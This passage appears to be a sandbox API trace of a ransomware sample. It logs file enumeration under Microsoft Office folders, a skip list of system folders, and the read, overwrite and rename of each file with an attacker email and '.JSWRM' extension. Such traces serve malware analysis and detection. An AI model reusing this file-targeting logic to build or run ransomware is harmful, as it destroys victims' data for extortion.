lpMultiByteStr="word2013bw.dotx", lpUsedDefaultChar=0x0) returned 15 [0121.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0121.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0121.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0121.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013bw.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013bw.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.065] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12049) returned 1 [0121.065] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f10) returned 0x24e1d8 [0121.065] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f10, lpOverlapped=0x0) returned 1 [0121.067] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.067] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f10, lpOverlapped=0x0) returned 1 [0121.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.067] CloseHandle (hObject=0x314) returned 1 [0121.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0121.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0121.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0121.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0121.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0121.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0121.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0121.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0121.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.068] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013bw.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013bw.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013bw.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013bw.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0121.069] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f11, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="word2013bw.dotx", cAlternateFileName="WORD20~2.DOT")) returned 0 [0121.069] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0121.069] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42ca, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ReviewRouting_Init.xsn", cAlternateFileName="REVIEW~1.XSN")) returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2=".") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="..") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="...") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="windows") returned -1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="recovery") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="perflogs") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="documents and settings") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="$RECYCLE.BIN") returned 1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="system volume information") returned -1 [0121.069] lstrcmpiW (lpString1="ReviewRouting_Init.xsn", lpString2="msocache") returned 1 [0121.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Init.xsn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Init.xsn", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReviewRouting_Init.xsn", lpUsedDefaultChar=0x0) returned 22 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Init.xsn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0121.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Init.xsn", cchWideChar=22, lpMultiByteStr=0x241290, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReviewRouting_Init.xsn", lpUsedDefaultChar=0x0) returned 22 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0121.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0121.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0121.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Init.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.070] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17098) returned 1 [0121.070] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x42c0) returned 0x24e1d8 [0121.070] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x42c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x42c0, lpOverlapped=0x0) returned 1 [0121.073] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.073] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x42c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x42c0, lpOverlapped=0x0) returned 1 [0121.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.073] CloseHandle (hObject=0x238) returned 1 [0121.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0121.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0121.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0121.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0121.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0121.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0121.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Init.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_init.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Init.xsn.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_init.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0121.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0121.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0121.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0121.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.074] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x514d, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ReviewRouting_Review.xsn", cAlternateFileName="REVIEW~2.XSN")) returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2=".") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="..") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="...") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="windows") returned -1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="recovery") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="perflogs") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="documents and settings") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="$RECYCLE.BIN") returned 1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="system volume information") returned -1 [0121.074] lstrcmpiW (lpString1="ReviewRouting_Review.xsn", lpString2="msocache") returned 1 [0121.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0121.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Review.xsn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0121.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0121.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Review.xsn", cchWideChar=24, lpMultiByteStr=0x241038, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReviewRouting_Review.xsn", lpUsedDefaultChar=0x0) returned 24 [0121.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0121.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0121.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Review.xsn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0121.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0121.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReviewRouting_Review.xsn", cchWideChar=24, lpMultiByteStr=0x240f20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReviewRouting_Review.xsn", lpUsedDefaultChar=0x0) returned 24 [0121.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0121.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0121.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0121.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0121.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Review.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_review.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.075] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20813) returned 1 [0121.076] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5140) returned 0x24e1d8 [0121.076] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x5140, lpOverlapped=0x0) returned 1 [0121.084] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.084] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x5140, lpOverlapped=0x0) returned 1 [0121.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.084] CloseHandle (hObject=0x238) returned 1 [0121.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0121.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0121.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0121.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0121.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0121.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Review.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_review.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Review.xsn.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_review.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0121.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0121.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0121.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0121.086] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x474a99c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x474a99c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x474a99c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ROSE.CSS", cAlternateFileName="")) returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2=".") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="..") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="...") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="windows") returned -1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="recovery") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="perflogs") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="documents and settings") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="system volume information") returned -1 [0121.086] lstrcmpiW (lpString1="ROSE.CSS", lpString2="msocache") returned 1 [0121.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0121.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROSE.CSS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0121.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROSE.CSS", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROSE.CSS", lpUsedDefaultChar=0x0) returned 8 [0121.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0121.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0121.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROSE.CSS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0121.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROSE.CSS", cchWideChar=8, lpMultiByteStr=0x345eba8, 